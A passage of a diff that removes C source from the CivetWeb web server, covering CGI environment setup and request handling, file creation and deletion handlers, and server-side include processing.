-				       "%s: Cannot allocate memory for CGI variable [%s]",
-				       __func__,
-				       fmt);
-				return;
-			}
-			env->buf = added;
-			env->buflen = n;
-			space = (env->buflen - env->bufused);
-		}
-
-		/* Make a pointer to the free space int the buffer */
-		added = env->buf + env->bufused;
-
-		/* Copy VARIABLE=VALUE\0 string into the free space */
-		va_start(ap, fmt);
-		mg_vsnprintf(env->conn, &truncated, added, (size_t)space, fmt, ap);
-		va_end(ap);
-
-		/* Do not add truncated strings to the environment */
-		if (truncated) {
-			/* Reallocate the buffer */
-			space = 0;
-			n = 1;
-		}
-	} while (truncated);
-
-	/* Calculate number of bytes added to the environment */
-	n = strlen(added) + 1;
-	env->bufused += n;
-
-	/* Now update the variable index */
-	space = (env->varlen - env->varused);
-	if (space < 2) {
-		mg_cry(env->conn,
-		       "%s: Cannot register CGI variable [%s]",
-		       __func__,
-		       fmt);
-		return;
-	}
-
-	/* Append a pointer to the added string into the envp array */
-	env->var[env->varused] = added;
-	env->varused++;
-}
-
-/* Return 0 on success, non-zero if an error occurs. */
-
-static int
-prepare_cgi_environment(struct mg_connection *conn,
-                        const char *prog,
-                        struct cgi_environment *env)
-{
-	const char *s;
-	struct vec var_vec;
-	char *p, src_addr[IP_ADDR_STR_LEN], http_var_name[128];
-	int i, truncated, uri_len;
-
-	if ((conn == NULL) || (prog == NULL) || (env == NULL)) {
-		return -1;
-	}
-
-	env->conn = conn;
-	env->buflen = CGI_ENVIRONMENT_SIZE;
-	env->bufused = 0;
-	env->buf = (char *)mg_malloc_ctx(env->buflen, conn->ctx);
-	if (env->buf == NULL) {
-		mg_cry(conn,
-		       "%s: Not enough memory for environmental buffer",
-		       __func__);
-		return -1;
-	}
-	env->varlen = MAX_CGI_ENVIR_VARS;
-	env->varused = 0;
-	env->var = (char **)mg_malloc_ctx(env->buflen * sizeof(char *), conn->ctx);
-	if (env->var == NULL) {
-		mg_cry(conn,
-		       "%s: Not enough memory for environmental variables",
-		       __func__);
-		mg_free(env->buf);
-		return -1;
-	}
-
-	addenv(env, "SERVER_NAME=%s", conn->ctx->config[AUTHENTICATION_DOMAIN]);
-	addenv(env, "SERVER_ROOT=%s", conn->ctx->config[DOCUMENT_ROOT]);
-	addenv(env, "DOCUMENT_ROOT=%s", conn->ctx->config[DOCUMENT_ROOT]);
-	addenv(env, "SERVER_SOFTWARE=%s/%s", "Civetweb", mg_version());
-
-	/* Prepare the environment block */
-	addenv(env, "%s", "GATEWAY_INTERFACE=CGI/1.1");
-	addenv(env, "%s", "SERVER_PROTOCOL=HTTP/1.1");
-	addenv(env, "%s", "REDIRECT_STATUS=200"); /* For PHP */
-
-#if defined(USE_IPV6)
-	if (conn->client.lsa.sa.sa_family == AF_INET6) {
-		addenv(env, "SERVER_PORT=%d", ntohs(conn->client.lsa.sin6.sin6_port));
-	} else
-#endif
-	{
-		addenv(env, "SERVER_PORT=%d", ntohs(conn->client.lsa.sin.sin_port));
-	}
-
-	sockaddr_to_string(src_addr, sizeof(src_addr), &conn->client.rsa);
-	addenv(env, "REMOTE_ADDR=%s", src_addr);
-
-	addenv(env, "REQUEST_METHOD=%s", conn->request_info.request_method);
-	addenv(env, "REMOTE_PORT=%d", conn->request_info.remote_port);
-
-	addenv(env, "REQUEST_URI=%s", conn->request_info.request_uri);
-	addenv(env, "LOCAL_URI=%s", conn->request_info.local_uri);
-
-	/* SCRIPT_NAME */
-	uri_len = (int)strlen(conn->request_info.local_uri);
-	if (conn->path_info == NULL) {
-		if (conn->request_info.local_uri[uri_len - 1] != '/') {
-			/* URI: /path_to_script/script.cgi */
-			addenv(env, "SCRIPT_NAME=%s", conn->request_info.local_uri);
-		} else {
-			/* URI: /path_to_script/ ... using index.cgi */
-			const char *index_file = strrchr(prog, '/');
-			if (index_file) {
-				addenv(env,
-				       "SCRIPT_NAME=%s%s",
-				       conn->request_info.local_uri,
-				       index_file + 1);
-			}
-		}
-	} else {
-		/* URI: /path_to_script/script.cgi/path_info */
-		addenv(env,
-		       "SCRIPT_NAME=%.*s",
-		       uri_len - (int)strlen(conn->path_info),
-		       conn->request_info.local_uri);
-	}
-
-	addenv(env, "SCRIPT_FILENAME=%s", prog);
-	if (conn->path_info == NULL) {
-		addenv(env, "PATH_TRANSLATED=%s", conn->ctx->config[DOCUMENT_ROOT]);
-	} else {
-		addenv(env,
-		       "PATH_TRANSLATED=%s%s",
-		       conn->ctx->config[DOCUMENT_ROOT],
-		       conn->path_info);
-	}
-
-	addenv(env, "HTTPS=%s", (conn->ssl == NULL) ? "off" : "on");
-
-	if ((s = mg_get_header(conn, "Content-Type")) != NULL) {
-		addenv(env, "CONTENT_TYPE=%s", s);
-	}
-	if (conn->request_info.query_string != NULL) {
-		addenv(env, "QUERY_STRING=%s", conn->request_info.query_string);
-	}
-	if ((s = mg_get_header(conn, "Content-Length")) != NULL) {
-		addenv(env, "CONTENT_LENGTH=%s", s);
-	}
-	if ((s = getenv("PATH")) != NULL) {
-		addenv(env, "PATH=%s", s);
-	}
-	if (conn->path_info != NULL) {
-		addenv(env, "PATH_INFO=%s", conn->path_info);
-	}
-
-	if (conn->status_code > 0) {
-		/* CGI error handler should show the status code */
-		addenv(env, "STATUS=%d", conn->status_code);
-	}
-
-#if defined(_WIN32)
-	if ((s = getenv("COMSPEC")) != NULL) {
-		addenv(env, "COMSPEC=%s", s);
-	}
-	if ((s = getenv("SYSTEMROOT")) != NULL) {
-		addenv(env, "SYSTEMROOT=%s", s);
-	}
-	if ((s = getenv("SystemDrive")) != NULL) {
-		addenv(env, "SystemDrive=%s", s);
-	}
-	if ((s = getenv("ProgramFiles")) != NULL) {
-		addenv(env, "ProgramFiles=%s", s);
-	}
-	if ((s = getenv("ProgramFiles(x86)")) != NULL) {
-		addenv(env, "ProgramFiles(x86)=%s", s);
-	}
-#else
-	if ((s = getenv("LD_LIBRARY_PATH")) != NULL) {
-		addenv(env, "LD_LIBRARY_PATH=%s", s);
-	}
-#endif /* _WIN32 */
-
-	if ((s = getenv("PERLLIB")) != NULL) {
-		addenv(env, "PERLLIB=%s", s);
-	}
-
-	if (conn->request_info.remote_user != NULL) {
-		addenv(env, "REMOTE_USER=%s", conn->request_info.remote_user);
-		addenv(env, "%s", "AUTH_TYPE=Digest");
-	}
-
-	/* Add all headers as HTTP_* variables */
-	for (i = 0; i < conn->request_info.num_headers; i++) {
-
-		(void)mg_snprintf(conn,
-		                  &truncated,
-		                  http_var_name,
-		                  sizeof(http_var_name),
-		                  "HTTP_%s",
-		                  conn->request_info.http_headers[i].name);
-
-		if (truncated) {
-			mg_cry(conn,
-			       "%s: HTTP header variable too long [%s]",
-			       __func__,
-			       conn->request_info.http_headers[i].name);
-			continue;
-		}
-
-		/* Convert variable name into uppercase, and change - to _ */
-		for (p = http_var_name; *p != '\0'; p++) {
-			if (*p == '-') {
-				*p = '_';
-			}
-			*p = (char)toupper(*(unsigned char *)p);
-		}
-
-		addenv(env,
-		       "%s=%s",
-		       http_var_name,
-		       conn->request_info.http_headers[i].value);
-	}
-
-	/* Add user-specified variables */
-	s = conn->ctx->config[CGI_ENVIRONMENT];
-	while ((s = next_option(s, &var_vec, NULL)) != NULL) {
-		addenv(env, "%.*s", (int)var_vec.len, var_vec.ptr);
-	}
-
-	env->var[env->varused] = NULL;
-	env->buf[env->bufused] = '\0';
-
-	return 0;
-}
-
-
-static void
-handle_cgi_request(struct mg_connection *conn, const char *prog)
-{
-	char *buf;
-	size_t buflen;
-	int headers_len, data_len, i, truncated;
-	int fdin[2] = {-1, -1}, fdout[2] = {-1, -1}, fderr[2] = {-1, -1};
-	const char *status, *status_text, *connection_state;
-	char *pbuf, dir[PATH_MAX], *p;
-	struct mg_request_info ri;
-	struct cgi_environment blk;
-	FILE *in = NULL, *out = NULL, *err = NULL;
-	struct mg_file fout = STRUCT_FILE_INITIALIZER;
-	pid_t pid = (pid_t)-1;
-
-	if (conn == NULL) {
-		return;
-	}
-
-	buf = NULL;
-	buflen = 16384;
-	i = prepare_cgi_environment(conn, prog, &blk);
-	if (i != 0) {
-		blk.buf = NULL;
-		blk.var = NULL;
-		goto done;
-	}
-
-	/* CGI must be executed in its own directory. 'dir' must point to the
-	 * directory containing executable program, 'p' must point to the
-	 * executable program name relative to 'dir'. */
-	(void)mg_snprintf(conn, &truncated, dir, sizeof(dir), "%s", prog);
-
-	if (truncated) {
-		mg_cry(conn, "Error: CGI program \"%s\": Path too long", prog);
-		mg_send_http_error(conn, 500, "Error: %s", "CGI path too long");
-		goto done;
-	}
-
-	if ((p = strrchr(dir, '/')) != NULL) {
-		*p++ = '\0';
-	} else {
-		dir[0] = '.';
-		dir[1] = '\0';
-		p = (char *)prog;
-	}
-
-	if ((pipe(fdin) != 0) || (pipe(fdout) != 0) || (pipe(fderr) != 0)) {
-		status = strerror(ERRNO);
-		mg_cry(conn,
-		       "Error: CGI program \"%s\": Can not create CGI pipes: %s",
-		       prog,
-		       status);
-		mg_send_http_error(conn,
-		                   500,
-		                   "Error: Cannot create CGI pipe: %s",
-		                   status);
-		goto done;
-	}
-
-	DEBUG_TRACE("CGI: spawn %s %s\n", dir, p);
-	pid = spawn_process(conn, p, blk.buf, blk.var, fdin, fdout, fderr, dir);
-
-	if (pid == (pid_t)-1) {
-		status = strerror(ERRNO);
-		mg_cry(conn,
-		       "Error: CGI program \"%s\": Can not spawn CGI process: %s",
-		       prog,
-		       status);
-		mg_send_http_error(conn,
-		                   500,
-		                   "Error: Cannot spawn CGI process [%s]: %s",
-		                   prog,
-		                   status);
-		goto done;
-	}
-
-	/* Make sure child closes all pipe descriptors. It must dup them to 0,1
-	 */
-	set_close_on_exec((SOCKET)fdin[0], conn);  /* stdin read */
-	set_close_on_exec((SOCKET)fdout[1], conn); /* stdout write */
-	set_close_on_exec((SOCKET)fderr[1], conn); /* stderr write */
-	set_close_on_exec((SOCKET)fdin[1], conn);  /* stdin write */
-	set_close_on_exec((SOCKET)fdout[0], conn); /* stdout read */
-	set_close_on_exec((SOCKET)fderr[0], conn); /* stderr read */
-
-	/* Parent closes only one side of the pipes.
-	 * If we don't mark them as closed, close() attempt before
-	 * return from this function throws an exception on Windows.
-	 * Windows does not like when closed descriptor is closed again. */
-	(void)close(fdin[0]);
-	(void)close(fdout[1]);
-	(void)close(fderr[1]);
-	fdin[0] = fdout[1] = fderr[1] = -1;
-
-	if ((in = fdopen(fdin[1], "wb")) == NULL) {
-		status = strerror(ERRNO);
-		mg_cry(conn,
-		       "Error: CGI program \"%s\": Can not open stdin: %s",
-		       prog,
-		       status);
-		mg_send_http_error(conn,
-		                   500,
-		                   "Error: CGI can not open fdin\nfopen: %s",
-		                   status);
-		goto done;
-	}
-
-	if ((out = fdopen(fdout[0], "rb")) == NULL) {
-		status = strerror(ERRNO);
-		mg_cry(conn,
-		       "Error: CGI program \"%s\": Can not open stdout: %s",
-		       prog,
-		       status);
-		mg_send_http_error(conn,
-		                   500,
-		                   "Error: CGI can not open fdout\nfopen: %s",
-		                   status);
-		goto done;
-	}
-
-	if ((err = fdopen(fderr[0], "rb")) == NULL) {
-		status = strerror(ERRNO);
-		mg_cry(conn,
-		       "Error: CGI program \"%s\": Can not open stderr: %s",
-		       prog,
-		       status);
-		mg_send_http_error(conn,
-		                   500,
-		                   "Error: CGI can not open fdout\nfopen: %s",
-		                   status);
-		goto done;
-	}
-
-	setbuf(in, NULL);
-	setbuf(out, NULL);
-	setbuf(err, NULL);
-	fout.access.fp = out;
-
-	if ((conn->request_info.content_length != 0) || (conn->is_chunked)) {
-		DEBUG_TRACE("CGI: send body data (%lli)\n",
-		            (signed long long)conn->request_info.content_length);
-
-		/* This is a POST/PUT request, or another request with body data. */
-		if (!forward_body_data(conn, in, INVALID_SOCKET, NULL)) {
-			/* Error sending the body data */
-			mg_cry(conn,
-			       "Error: CGI program \"%s\": Forward body data failed",
-			       prog);
-			goto done;
-		}
-	}
-
-	/* Close so child gets an EOF. */
-	fclose(in);
-	in = NULL;
-	fdin[1] = -1;
-
-	/* Now read CGI reply into a buffer. We need to set correct
-	 * status code, thus we need to see all HTTP headers first.
-	 * Do not send anything back to client, until we buffer in all
-	 * HTTP headers. */
-	data_len = 0;
-	buf = (char *)mg_malloc_ctx(buflen, conn->ctx);
-	if (buf == NULL) {
-		mg_send_http_error(conn,
-		                   500,
-		                   "Error: Not enough memory for CGI buffer (%u bytes)",
-		                   (unsigned int)buflen);
-		mg_cry(conn,
-		       "Error: CGI program \"%s\": Not enough memory for buffer (%u "
-		       "bytes)",
-		       prog,
-		       (unsigned int)buflen);
-		goto done;
-	}
-
-	DEBUG_TRACE("CGI: %s", "wait for response");
-	headers_len = read_message(out, conn, buf, (int)buflen, &data_len);
-	DEBUG_TRACE("CGI: response: %li", (signed long)headers_len);
-
-	if (headers_len <= 0) {
-
-		/* Could not parse the CGI response. Check if some error message on
-		 * stderr. */
-		i = pull_all(err, conn, buf, (int)buflen);
-		if (i > 0) {
-			mg_cry(conn,
-			       "Error: CGI program \"%s\" sent error "
-			       "message: [%.*s]",
-			       prog,
-			       i,
-			       buf);
-			mg_send_http_error(conn,
-			                   500,
-			                   "Error: CGI program \"%s\" sent error "
-			                   "message: [%.*s]",
-			                   prog,
-			                   i,
-			                   buf);
-		} else {
-			mg_cry(conn,
-			       "Error: CGI program sent malformed or too big "
-			       "(>%u bytes) HTTP headers: [%.*s]",
-			       (unsigned)buflen,
-			       data_len,
-			       buf);
-
-			mg_send_http_error(conn,
-			                   500,
-			                   "Error: CGI program sent malformed or too big "
-			                   "(>%u bytes) HTTP headers: [%.*s]",
-			                   (unsigned)buflen,
-			                   data_len,
-			                   buf);
-		}
-
-		goto done;
-	}
-
-	pbuf = buf;
-	buf[headers_len - 1] = '\0';
-	ri.num_headers = parse_http_headers(&pbuf, ri.http_headers);
-
-	/* Make up and send the status line */
-	status_text = "OK";
-	if ((status = get_header(ri.http_headers, ri.num_headers, "Status"))
-	    != NULL) {
-		conn->status_code = atoi(status);
-		status_text = status;
-		while (isdigit(*(const unsigned char *)status_text)
-		       || *status_text == ' ') {
-			status_text++;
-		}
-	} else if (get_header(ri.http_headers, ri.num_headers, "Location")
-	           != NULL) {
-		conn->status_code = 302;
-	} else {
-		conn->status_code = 200;
-	}
-	connection_state =
-	    get_header(ri.http_headers, ri.num_headers, "Connection");
-	if (!header_has_option(connection_state, "keep-alive")) {
-		conn->must_close = 1;
-	}
-
-	DEBUG_TRACE("CGI: response %u %s", conn->status_code, status_text);
-
-	(void)mg_printf(conn, "HTTP/1.1 %d %s\r\n", conn->status_code, status_text);
-
-	/* Send headers */
-	for (i = 0; i < ri.num_headers; i++) {
-		mg_printf(conn,
-		          "%s: %s\r\n",
-		          ri.http_headers[i].name,
-		          ri.http_headers[i].value);
-	}
-	mg_write(conn, "\r\n", 2);
-
-	/* Send chunk of data that may have been read after the headers */
-	mg_write(conn, buf + headers_len, (size_t)(data_len - headers_len));
-
-	/* Read the rest of CGI output and send to the client */
-	send_file_data(conn, &fout, 0, INT64_MAX);
-
-	DEBUG_TRACE("CGI: %s", "all data sent");
-
-done:
-	mg_free(blk.var);
-	mg_free(blk.buf);
-
-	if (pid != (pid_t)-1) {
-		kill(pid, SIGKILL);
-#if !defined(_WIN32)
-		{
-			int st;
-			while (waitpid(pid, &st, 0) != -1)
-				; /* clean zombies */
-		}
-#endif
-	}
-	if (fdin[0] != -1) {
-		close(fdin[0]);
-	}
-	if (fdout[1] != -1) {
-		close(fdout[1]);
-	}
-
-	if (in != NULL) {
-		fclose(in);
-	} else if (fdin[1] != -1) {
-		close(fdin[1]);
-	}
-
-	if (out != NULL) {
-		fclose(out);
-	} else if (fdout[0] != -1) {
-		close(fdout[0]);
-	}
-
-	if (err != NULL) {
-		fclose(err);
-	} else if (fderr[0] != -1) {
-		close(fderr[0]);
-	}
-
-	if (buf != NULL) {
-		mg_free(buf);
-	}
-}
-#endif /* !NO_CGI */
-
-
-#if !defined(NO_FILES)
-static void
-mkcol(struct mg_connection *conn, const char *path)
-{
-	int rc, body_len;
-	struct de de;
-	char date[64];
-	time_t curtime = time(NULL);
-
-	if (conn == NULL) {
-		return;
-	}
-
-	/* TODO (mid): Check the mg_send_http_error situations in this function
-	 */
-
-	memset(&de.file, 0, sizeof(de.file));
-	if (!mg_stat(conn, path, &de.file)) {
-		mg_cry(conn,
-		       "%s: mg_stat(%s) failed: %s",
-		       __func__,
-		       path,
-		       strerror(ERRNO));
-	}
-
-	if (de.file.last_modified) {
-		/* TODO (mid): This check does not seem to make any sense ! */
-		/* TODO (mid): Add a webdav unit test first, before changing
-		 * anything here. */
-		mg_send_http_error(
-		    conn, 405, "Error: mkcol(%s): %s", path, strerror(ERRNO));
-		return;
-	}
-
-	body_len = conn->data_len - conn->request_len;
-	if (body_len > 0) {
-		mg_send_http_error(
-		    conn, 415, "Error: mkcol(%s): %s", path, strerror(ERRNO));
-		return;
-	}
-
-	rc = mg_mkdir(conn, path, 0755);
-
-	if (rc == 0) {
-		conn->status_code = 201;
-		gmt_time_string(date, sizeof(date), &curtime);
-		mg_printf(conn,
-		          "HTTP/1.1 %d Created\r\n"
-		          "Date: %s\r\n",
-		          conn->status_code,
-		          date);
-		send_static_cache_header(conn);
-		send_additional_header(conn);
-		mg_printf(conn,
-		          "Content-Length: 0\r\n"
-		          "Connection: %s\r\n\r\n",
-		          suggest_connection_header(conn));
-	} else if (rc == -1) {
-		if (errno == EEXIST) {
-			mg_send_http_error(
-			    conn, 405, "Error: mkcol(%s): %s", path, strerror(ERRNO));
-		} else if (errno == EACCES) {
-			mg_send_http_error(
-			    conn, 403, "Error: mkcol(%s): %s", path, strerror(ERRNO));
-		} else if (errno == ENOENT) {
-			mg_send_http_error(
-			    conn, 409, "Error: mkcol(%s): %s", path, strerror(ERRNO));
-		} else {
-			mg_send_http_error(
-			    conn, 500, "fopen(%s): %s", path, strerror(ERRNO));
-		}
-	}
-}
-
-
-static void
-put_file(struct mg_connection *conn, const char *path)
-{
-	struct mg_file file = STRUCT_FILE_INITIALIZER;
-	const char *range;
-	int64_t r1, r2;
-	int rc;
-	char date[64];
-	time_t curtime = time(NULL);
-
-	if (conn == NULL) {
-		return;
-	}
-
-	if (mg_stat(conn, path, &file.stat)) {
-		/* File already exists */
-		conn->status_code = 200;
-
-		if (file.stat.is_directory) {
-			/* This is an already existing directory,
-			 * so there is nothing to do for the server. */
-			rc = 0;
-
-		} else {
-			/* File exists and is not a directory. */
-			/* Can it be replaced? */
-
-			if (file.access.membuf != NULL) {
-				/* This is an "in-memory" file, that can not be replaced */
-				mg_send_http_error(conn,
-				                   405,
-				                   "Error: Put not possible\nReplacing %s "
-				                   "is not supported",
-				                   path);
-				return;
-			}
-
-			/* Check if the server may write this file */
-			if (access(path, W_OK) == 0) {
-				/* Access granted */
-				conn->status_code = 200;
-				rc = 1;
-			} else {
-				mg_send_http_error(
-				    conn,
-				    403,
-				    "Error: Put not possible\nReplacing %s is not allowed",
-				    path);
-				return;
-			}
-		}
-	} else {
-		/* File should be created */
-		conn->status_code = 201;
-		rc = put_dir(conn, path);
-	}
-
-	if (rc == 0) {
-		/* put_dir returns 0 if path is a directory */
-		gmt_time_string(date, sizeof(date), &curtime);
-		mg_printf(conn,
-		          "HTTP/1.1 %d %s\r\n",
-		          conn->status_code,
-		          mg_get_response_code_text(NULL, conn->status_code));
-		send_no_cache_header(conn);
-		send_additional_header(conn);
-		mg_printf(conn,
-		          "Date: %s\r\n"
-		          "Content-Length: 0\r\n"
-		          "Connection: %s\r\n\r\n",
-		          date,
-		          suggest_connection_header(conn));
-
-		/* Request to create a directory has been fulfilled successfully.
-		 * No need to put a file. */
-		return;
-	}
-
-	if (rc == -1) {
-		/* put_dir returns -1 if the path is too long */
-		mg_send_http_error(conn,
-		                   414,
-		                   "Error: Path too long\nput_dir(%s): %s",
-		                   path,
-		                   strerror(ERRNO));
-		return;
-	}
-
-	if (rc == -2) {
-		/* put_dir returns -2 if the directory can not be created */
-		mg_send_http_error(conn,
-		                   500,
-		                   "Error: Can not create directory\nput_dir(%s): %s",
-		                   path,
-		                   strerror(ERRNO));
-		return;
-	}
-
-	/* A file should be created or overwritten. */
-	/* Currently CivetWeb does not nead read+write access. */
-	if (!mg_fopen(conn, path, MG_FOPEN_MODE_WRITE, &file)
-	    || file.access.fp == NULL) {
-		(void)mg_fclose(&file.access);
-		mg_send_http_error(conn,
-		                   500,
-		                   "Error: Can not create file\nfopen(%s): %s",
-		                   path,
-		                   strerror(ERRNO));
-		return;
-	}
-
-	fclose_on_exec(&file.access, conn);
-	range = mg_get_header(conn, "Content-Range");
-	r1 = r2 = 0;
-	if ((range != NULL) && parse_range_header(range, &r1, &r2) > 0) {
-		conn->status_code = 206; /* Partial content */
-		fseeko(file.access.fp, r1, SEEK_SET);
-	}
-
-	if (!forward_body_data(conn, file.access.fp, INVALID_SOCKET, NULL)) {
-		/* forward_body_data failed.
-		 * The error code has already been sent to the client,
-		 * and conn->status_code is already set. */
-		(void)mg_fclose(&file.access);
-		return;
-	}
-
-	if (mg_fclose(&file.access) != 0) {
-		/* fclose failed. This might have different reasons, but a likely
-		 * one is "no space on disk", http 507. */
-		conn->status_code = 507;
-	}
-
-	gmt_time_string(date, sizeof(date), &curtime);
-	mg_printf(conn,
-	          "HTTP/1.1 %d %s\r\n",
-	          conn->status_code,
-	          mg_get_response_code_text(NULL, conn->status_code));
-	send_no_cache_header(conn);
-	send_additional_header(conn);
-	mg_printf(conn,
-	          "Date: %s\r\n"
-	          "Content-Length: 0\r\n"
-	          "Connection: %s\r\n\r\n",
-	          date,
-	          suggest_connection_header(conn));
-}
-
-
-static void
-delete_file(struct mg_connection *conn, const char *path)
-{
-	struct de de;
-	memset(&de.file, 0, sizeof(de.file));
-	if (!mg_stat(conn, path, &de.file)) {
-		/* mg_stat returns 0 if the file does not exist */
-		mg_send_http_error(conn,
-		                   404,
-		                   "Error: Cannot delete file\nFile %s not found",
-		                   path);
-		return;
-	}
-
-#if 0 /* Ignore if a file in memory is inside a folder */
-        if (de.access.membuf != NULL) {
-                /* the file is cached in memory */
-                mg_send_http_error(
-                    conn,
-                    405,
-                    "Error: Delete not possible\nDeleting %s is not supported",
-                    path);
-                return;
-        }
-#endif
-
-	if (de.file.is_directory) {
-		if (remove_directory(conn, path)) {
-			/* Delete is successful: Return 204 without content. */
-			mg_send_http_error(conn, 204, "%s", "");
-		} else {
-			/* Delete is not successful: Return 500 (Server error). */
-			mg_send_http_error(conn, 500, "Error: Could not delete %s", path);
-		}
-		return;
-	}
-
-	/* This is an existing file (not a directory).
-	 * Check if write permission is granted. */
-	if (access(path, W_OK) != 0) {
-		/* File is read only */
-		mg_send_http_error(
-		    conn,
-		    403,
-		    "Error: Delete not possible\nDeleting %s is not allowed",
-		    path);
-		return;
-	}
-
-	/* Try to delete it. */
-	if (mg_remove(conn, path) == 0) {
-		/* Delete was successful: Return 204 without content. */
-		mg_send_http_error(conn, 204, "%s", "");
-	} else {
-		/* Delete not successful (file locked). */
-		mg_send_http_error(conn,
-		                   423,
-		                   "Error: Cannot delete file\nremove(%s): %s",
-		                   path,
-		                   strerror(ERRNO));
-	}
-}
-#endif /* !NO_FILES */
-
-
-static void
-send_ssi_file(struct mg_connection *, const char *, struct mg_file *, int);
-
-
-static void
-do_ssi_include(struct mg_connection *conn,
-               const char *ssi,
-               char *tag,
-               int include_level)
-{
-	char file_name[MG_BUF_LEN], path[512], *p;
-	struct mg_file file = STRUCT_FILE_INITIALIZER;
-	size_t len;
-	int truncated = 0;
-
-	if (conn == NULL) {
-		return;
-	}
-
-	/* sscanf() is safe here, since send_ssi_file() also uses buffer
-	 * of size MG_BUF_LEN to get the tag. So strlen(tag) is
-	 * always < MG_BUF_LEN. */
-	if (sscanf(tag, " virtual=\"%511[^\"]\"", file_name) == 1) {
-		/* File name is relative to the webserver root */
-		file_name[511] = 0;
-		(void)mg_snprintf(conn,
-		                  &truncated,
-		                  path,
-		                  sizeof(path),
-		                  "%s/%s",
-		                  conn->ctx->config[DOCUMENT_ROOT],
-		                  file_name);
-
-	} else if (sscanf(tag, " abspath=\"%511[^\"]\"", file_name) == 1) {
-		/* File name is relative to the webserver working directory
-		 * or it is absolute system path */
-		file_name[511] = 0;
-		(void)
-		    mg_snprintf(conn, &truncated, path, sizeof(path), "%s", file_name);
-
-	} else if ((sscanf(tag, " file=\"%511[^\"]\"", file_name) == 1)
-	           || (sscanf(tag, " \"%511[^\"]\"", file_name) == 1)) {
-		/* File name is relative to the currect document */
-		file_name[511] = 0;
-		(void)mg_snprintf(conn, &truncated, path, sizeof(path), "%s", ssi);
-
-		if (!truncated) {
-			if ((p = strrchr(path, '/')) != NULL) {
-				p[1] = '\0';
-			}
-			len = strlen(path);
-			(void)mg_snprintf(conn,
-			                  &truncated,
-			                  path + len,
-			                  sizeof(path) - len,
-			                  "%s",
-			                  file_name);
-		}
-
-	} else {
-		mg_cry(conn, "Bad SSI #include: [%s]", tag);
-		return;
-	}
-
-	if (truncated) {
-		mg_cry(conn, "SSI #include path length overflow: [%s]", tag);
-		return;
-	}
-
-	if (!mg_fopen(conn, path, MG_FOPEN_MODE_READ, &file)) {
-		mg_cry(conn,
-		       "Cannot open SSI #include: [%s]: fopen(%s): %s",
-		       tag,
-		       path,
-		       strerror(ERRNO));
-	} else {
-		fclose_on_exec(&file.access, conn);
-		if (match_prefix(conn->ctx->config[SSI_EXTENSIONS],
-		                 strlen(conn->ctx->config[SSI_EXTENSIONS]),
-		                 path) > 0) {
-			send_ssi_file(conn, path, &file, include_level + 1);
-		} else {
-			send_file_data(conn, &file, 0, INT64_MAX);
-		}
-		(void)mg_fclose(&file.access); /* Ignore errors for readonly files */
-	}
-}
-
-
-#if !defined(NO_POPEN)
-static void
-do_ssi_exec(struct mg_connection *conn, char *tag)
-{
-	char cmd[1024] = "";
-	struct mg_file file = STRUCT_FILE_INITIALIZER;
-
-	if (sscanf(tag, " \"%1023[^\"]\"", cmd) != 1) {
-		mg_cry(conn, "Bad SSI #exec: [%s]", tag);
-	} else {
-		cmd[1023] = 0;
-		if ((file.access.fp = popen(cmd, "r")) == NULL) {
-			mg_cry(conn, "Cannot SSI #exec: [%s]: %s", cmd, strerror(ERRNO));
-		} else {
-			send_file_data(conn, &file, 0, INT64_MAX);
-			pclose(file.access.fp);
-		}
-	}
-}
-#endif /* !NO_POPEN */
-
-
-static int
-mg_fgetc(struct mg_file *filep, int offset)
-{
-	if (filep == NULL) {
-		return EOF;
-	}
-	if ((filep->access.membuf != NULL) && (offset >= 0)
-	    && (((unsigned int)(offset)) < filep->stat.size)) {
-		return ((const unsigned char *)filep->access.membuf)[offset];
-	} else if (filep->access.fp != NULL) {
-		return fgetc(filep->access.fp);
-	} else {
-		return EOF;
-	}
-}
-
-
-static void
-send_ssi_file(struct mg_connection *conn,
-              const char *path,
-              struct mg_file *filep,
-              int include_level)
-{
-	char buf[MG_BUF_LEN];
-	int ch, offset, len, in_tag, in_ssi_tag;
-
-	if (include_level > 10) {
-		mg_cry(conn, "SSI #include level is too deep (%s)", path);
-		return;
-	}
-
-	in_tag = in_ssi_tag = len = offset = 0;
-
-	/* Read file, byte by byte, and look for SSI include tags */
-	while ((ch = mg_fgetc(filep, offset++)) != EOF) {
-
-		if (in_tag) {
-			/* We are in a tag, either SSI tag or html tag */
-
-			if (ch == '>') {
-				/* Tag is closing */
-				buf[len++] = '>';
-
-				if (in_ssi_tag) {
-					/* Handle SSI tag */
-					buf[len] = 0;
-
-					if (!memcmp(buf + 5, "include", 7)) {
-						do_ssi_include(conn, path, buf + 12, include_level + 1);
-#if !defined(NO_POPEN)
-					} else if (!memcmp(buf + 5, "exec", 4)) {
-						do_ssi_exec(conn, buf + 9);
-#endif /* !NO_POPEN */
-					} else {
-						mg_cry(conn,
-						       "%s: unknown SSI "
-						       "command: \"%s\"",
-						       path,
-						       buf);
-					}
-					len = 0;
-					in_ssi_tag = in_tag = 0;
-
-				} else {
-					/* Not an SSI tag */
-					/* Flush buffer */
-					(void)mg_write(conn, buf, (size_t)len);
-					len = 0;
-					in_tag = 0;
-				}
-
-			} else {
-				/* Tag is still open */
-				buf[len++] = (char)(ch & 0xff);
-
-				if ((len == 5) && !memcmp(buf, "<!--#", 5)) {
-					/* All SSI tags start with <!--# */
-					in_ssi_tag = 1;
-				}
-
-				if ((len + 2) > (int)sizeof(buf)) {
-					/* Tag to long for buffer */
-					mg_cry(conn, "%s: tag is too large", path);
-					return;
-				}
-			}
-
-		} else {
-			/* We are not in a tag yet. */
-
-			if (ch == '<') {
-				/* Tag is opening */
-				in_tag = 1;
-				/* Flush current buffer */
-				(void)mg_write(conn, buf, (size_t)len);
-				/* Store the < */
-				len = 1;
-				buf[0] = '<';
-
-			} else {
-				/* No Tag */
-				/* Add data to buffer */
-				buf[len++] = (char)(ch & 0xff);
-				/* Flush if buffer is full */
-				if (len == (int)sizeof(buf)) {
-					mg_write(conn, buf, (size_t)len);
-					len = 0;
-				}
-			}
-		}
-	}
-
-	/* Send the rest of buffered data */
-	if (len > 0) {
-		mg_write(conn, buf, (size_t)len);
-	}
-}
-
-
-static void
-handle_ssi_file_request(struct mg_connection *conn,
-                        const char *path,
-                        struct mg_file *filep)
-{
-	char date[64];
-	time_t curtime = time(NULL);
-	const char *cors1, *cors2, *cors3;
-
-	if ((conn == NULL) || (path == NULL) || (filep == NULL)) {
-		return;
-	}
-
-	if (mg_get_header(conn, "Origin")) {
-		/* Cross-origin resource sharing (CORS). */
-		cors1 = "Access-Control-Allow-Origin: ";
-		cors2 = conn->ctx->config[ACCESS_CONTROL_ALLOW_ORIGIN];
-		cors3 = "\r\n";
-	} else {
-		cors1 = cors2 = cors3 = "";
-	}
-
